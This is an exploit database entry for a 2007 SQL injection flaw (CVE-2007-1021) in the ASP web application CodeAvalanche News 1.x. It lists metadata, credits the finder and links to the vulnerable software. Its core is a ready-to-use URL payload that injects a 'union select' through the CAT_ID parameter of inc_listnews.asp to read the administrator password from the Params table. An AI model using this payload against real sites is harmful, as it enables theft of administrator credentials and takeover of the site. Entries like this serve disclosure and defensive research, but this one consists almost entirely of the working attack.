[] NeoSense

CodeAvalanche News 1.x - 'CAT_ID' SQL Injection

Author: beks
type: webapps
platform: asp
port: 
date_added: 2007-02-14 
date_updated:  
verified: 1 
codes: OSVDB-35130;CVE-2007-1021 
tags: 
aliases:  
screenshot_url:  
application_url: 

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# milw0rm.com [2007-02-15]